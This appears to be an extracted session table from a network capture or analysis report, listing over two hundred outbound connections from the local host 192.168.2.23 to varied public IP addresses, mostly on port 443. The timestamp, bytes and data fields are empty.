                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25290192.168.2.234390091.47.92.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25291192.168.2.2350732212.115.93.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25292192.168.2.2352382213.181.132.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25293192.168.2.2349250183.188.34.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25294192.168.2.2348414207.250.67.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25295192.168.2.2359912161.104.238.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25296192.168.2.2339086189.120.115.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25297192.168.2.235117844.89.179.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25298192.168.2.2339826222.140.131.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25299192.168.2.2359884185.163.183.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25300192.168.2.2346136103.50.137.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25301192.168.2.2343808137.207.105.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25302192.168.2.2350498182.251.44.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25303192.168.2.235057290.43.250.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25304192.168.2.2342446104.25.19.1228080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25305192.168.2.2349196142.224.80.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25306192.168.2.2355010147.207.7.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25307192.168.2.2358466209.154.41.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25308192.168.2.233452846.238.151.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25309192.168.2.235792812.4.100.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25310192.168.2.235737089.25.186.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25311192.168.2.2354070170.141.229.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25312192.168.2.236028090.13.89.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25313192.168.2.235196288.160.172.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25314192.168.2.2339900141.131.234.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25315192.168.2.2346928188.205.175.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25316192.168.2.2343276157.43.174.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25317192.168.2.2350164133.126.222.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25318192.168.2.2356564174.127.77.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25319192.168.2.2337400128.98.172.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25320192.168.2.2336162181.109.18.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25321192.168.2.2346750168.92.59.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25322192.168.2.2337120155.214.92.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25323192.168.2.2334294170.92.189.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25324192.168.2.2341994137.235.78.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25325192.168.2.236075023.47.81.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25326192.168.2.234908274.60.173.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25327192.168.2.2337480154.162.13.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25328192.168.2.2353742168.190.32.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25329192.168.2.233281413.107.127.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25330192.168.2.235074482.32.214.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25331192.168.2.234064054.101.67.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25332192.168.2.2356462175.75.246.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25333192.168.2.23538248.124.161.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25334192.168.2.2345018138.48.184.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25335192.168.2.235971296.235.50.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25336192.168.2.2358450188.88.0.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25337192.168.2.2355004187.190.97.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25338192.168.2.234857277.130.170.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25339192.168.2.2355254220.208.85.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25340192.168.2.235565882.79.129.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25341192.168.2.2338384185.232.154.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25342192.168.2.2348830205.132.34.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25343192.168.2.2338888165.136.66.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25344192.168.2.2332826159.82.202.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25345192.168.2.2351598216.108.241.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25346192.168.2.2333164210.151.170.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25347192.168.2.2344552137.141.70.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25348192.168.2.236021640.153.18.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25349192.168.2.2334794223.196.211.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25350192.168.2.235137237.162.96.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25351192.168.2.234685820.162.176.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25352192.168.2.2359166111.219.200.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25353192.168.2.2349116165.227.79.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25354192.168.2.2356646118.232.43.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25355192.168.2.2332796209.206.89.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25356192.168.2.2355294133.241.140.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25357192.168.2.233324874.13.152.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25358192.168.2.2347560147.51.128.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25359192.168.2.2350154137.60.16.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25360192.168.2.2351794177.62.23.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25361192.168.2.233840265.85.196.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25362192.168.2.233709494.93.107.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25363192.168.2.2356972188.191.117.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25364192.168.2.2349584130.250.176.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25365192.168.2.2334054100.41.198.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25366192.168.2.2342322126.31.60.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25367192.168.2.235226223.84.224.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25368192.168.2.235854271.251.193.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25369192.168.2.2358692151.38.168.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25370192.168.2.2336130102.31.158.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25371192.168.2.234969439.122.103.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25372192.168.2.2353748205.44.21.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25373192.168.2.2353590149.225.87.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25374192.168.2.2341866223.169.119.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25375192.168.2.2348350110.73.53.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25376192.168.2.2347240176.126.112.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25377192.168.2.2358488160.202.224.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25378192.168.2.2336584161.102.227.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25379192.168.2.2341780111.225.174.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25380192.168.2.2347626167.5.247.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25381192.168.2.2355748159.105.212.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25382192.168.2.2353508144.249.52.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25383192.168.2.235437479.35.28.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25384192.168.2.2358128143.150.230.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25385192.168.2.235333091.215.167.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25386192.168.2.234342662.133.202.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25387192.168.2.2352732132.24.136.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25388192.168.2.234347045.156.239.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25389192.168.2.235072270.32.96.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25390192.168.2.2342242135.81.74.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25391192.168.2.233783236.123.41.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25392192.168.2.234382038.69.174.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25393192.168.2.2344942123.40.209.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25394192.168.2.2338440211.156.71.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25395192.168.2.2354108150.36.176.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25396192.168.2.2353736217.98.91.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25397192.168.2.234258652.31.205.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25398192.168.2.2349796192.57.192.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25399192.168.2.2333892217.107.91.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25400192.168.2.2339160129.60.35.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25401192.168.2.235289458.211.135.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25402192.168.2.2344534133.251.98.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25403192.168.2.2353640223.39.170.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25404192.168.2.2360366111.52.60.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25405192.168.2.2340212196.199.202.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25406192.168.2.2359818148.226.23.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25407192.168.2.234976086.48.162.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25408192.168.2.2346704107.93.122.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25409192.168.2.2347054144.158.6.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25410192.168.2.235390244.18.224.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25411192.168.2.236055471.96.253.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25412192.168.2.2359498110.97.51.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25413192.168.2.235963080.220.49.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25414192.168.2.235412879.31.56.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25415192.168.2.2357354136.131.144.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25416192.168.2.2345416207.212.95.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25417192.168.2.2355024117.2.120.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25418192.168.2.235215282.109.204.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25419192.168.2.2350706177.108.188.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25420192.168.2.2345696124.39.147.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25421192.168.2.2351806180.186.67.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25422192.168.2.2346002154.171.129.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25423192.168.2.2334014122.120.192.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25424192.168.2.2345966211.124.47.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25425192.168.2.233698062.241.58.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25426192.168.2.236010232.221.96.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25427192.168.2.2357208107.84.174.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25428192.168.2.2333812221.157.67.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25429192.168.2.2346258198.56.42.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25430192.168.2.2358386101.126.123.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25431192.168.2.2351134211.33.67.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25432192.168.2.2357348173.120.212.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25433192.168.2.2336450146.2.150.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25434192.168.2.2341852199.44.34.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25435192.168.2.2357684174.4.24.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25436192.168.2.235500489.101.181.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25437192.168.2.2351798119.183.37.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25438192.168.2.2354370202.225.208.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25439192.168.2.236007871.131.201.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25440192.168.2.2355876210.123.133.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25441192.168.2.234245842.123.71.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25442192.168.2.2360144122.110.77.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25443192.168.2.234144489.226.6.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25444192.168.2.2348298177.74.59.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25445192.168.2.2353026110.29.50.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25446192.168.2.234627254.99.141.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25447192.168.2.2332802156.97.231.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25448192.168.2.235071661.16.57.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25449192.168.2.235395412.61.166.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25450192.168.2.2352032134.179.250.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25451192.168.2.233945892.214.42.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25452192.168.2.234127219.11.206.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25453192.168.2.234263653.19.112.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25454192.168.2.234990027.84.41.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25455192.168.2.234442252.139.84.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25456192.168.2.234905295.160.5.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25457192.168.2.2354916204.254.115.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25458192.168.2.2356648154.235.142.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25459192.168.2.2342680124.21.117.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25460192.168.2.2347512152.138.8.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25461192.168.2.2360720161.171.241.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25462192.168.2.2334898192.157.121.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25463192.168.2.2333800223.17.223.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25464192.168.2.234920879.122.109.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25465192.168.2.234552897.3.202.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25466192.168.2.2350608141.48.161.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25467192.168.2.234228418.135.0.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25468192.168.2.23532588.37.75.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25469192.168.2.2340704108.125.4.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25470192.168.2.2338816213.60.57.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25471192.168.2.234496618.103.155.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25472192.168.2.23552269.255.7.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25473192.168.2.235006898.56.159.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25474192.168.2.2360258158.21.199.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25475192.168.2.2336612107.16.209.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25476192.168.2.2345562151.72.135.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25477192.168.2.2347112193.79.58.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25478192.168.2.2354232156.115.212.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25479192.168.2.2336416152.2.229.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25480192.168.2.234103260.76.111.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25481192.168.2.2351544194.181.14.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25482192.168.2.2353562189.155.19.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25483192.168.2.234701834.223.168.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25484192.168.2.234647471.114.157.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25485192.168.2.233391074.243.195.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25486192.168.2.2335820167.207.227.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25487192.168.2.2337810218.107.90.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25488192.168.2.2355828128.62.36.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25489192.168.2.23328601.97.165.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25490192.168.2.235197690.191.194.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25491192.168.2.234686244.55.110.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25492192.168.2.2358910188.251.220.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25493192.168.2.233421892.21.168.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25494192.168.2.2346834115.187.44.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25495192.168.2.2341130122.245.42.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25496192.168.2.2356166108.250.221.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25497192.168.2.236080247.172.122.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25498192.168.2.234520637.150.205.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25499192.168.2.233370245.184.236.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25500192.168.2.234118879.74.253.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25501192.168.2.2337112190.188.237.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25502192.168.2.2345614151.107.239.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25503192.168.2.2341808105.238.248.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25504192.168.2.2342214164.0.31.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25505192.168.2.2354542162.69.228.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25506192.168.2.2353472186.216.118.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25507192.168.2.235768660.55.232.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25508192.168.2.234293488.16.142.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25509192.168.2.2348936134.147.76.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25510192.168.2.235728089.174.58.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25511192.168.2.2344582199.225.74.147443
